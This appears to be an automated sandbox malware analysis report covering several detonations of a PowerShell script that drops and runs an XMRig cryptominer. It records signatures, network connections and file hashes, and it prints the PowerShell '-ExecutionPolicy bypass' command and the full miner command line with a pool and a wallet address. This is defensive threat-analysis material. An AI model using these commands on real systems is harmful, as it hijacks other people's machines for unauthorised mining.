| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3296 wrote to memory of 5072 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3296 wrote to memory of 5072 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/3296-0-0x00007FFE19733000-0x00007FFE19734000-memory.dmp
memory/3296-5-0x000002166CBE0000-0x000002166CC02000-memory.dmp
memory/3296-8-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp
memory/3296-9-0x000002166CD10000-0x000002166CD86000-memory.dmp
memory/3296-10-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y1eyvrmh.eun.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3296-25-0x00007FFE19730000-0x00007FFE1A11C000-memory.dmp
memory/3296-48-0x000002166CAD0000-0x000002166CAE2000-memory.dmp
memory/3296-61-0x000002166CA60000-0x000002166CA6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:19
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1770s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2492 wrote to memory of 408 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2492 wrote to memory of 408 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4pxmenso.aw4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:14
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1757s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3032 wrote to memory of 776 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3032 wrote to memory of 776 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ht54pq22.wxa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:53
Platform
win10v2004-20240426-en
Max time kernel
1798s
Max time network
1771s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1896 wrote to memory of 3512 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1896 wrote to memory of 3512 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ppacifep.hrt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:56
Platform
win11-20240508-en
Max time kernel
1798s
Max time network
1767s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2468 wrote to memory of 1616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2468 wrote to memory of 1616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/2468-0-0x00007FFB81333000-0x00007FFB81335000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_afjuoutj.m3e.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:01
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1340 wrote to memory of 3636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1340 wrote to memory of 3636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kmmlh25.syb.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1340-25-0x00007FFAA4D40000-0x00007FFAA572C000-memory.dmp
memory/1340-48-0x00000253F7F00000-0x00000253F7F12000-memory.dmp
memory/1340-61-0x00000253F7C80000-0x00000253F7C8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:56
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1759s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5064 wrote to memory of 4152 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
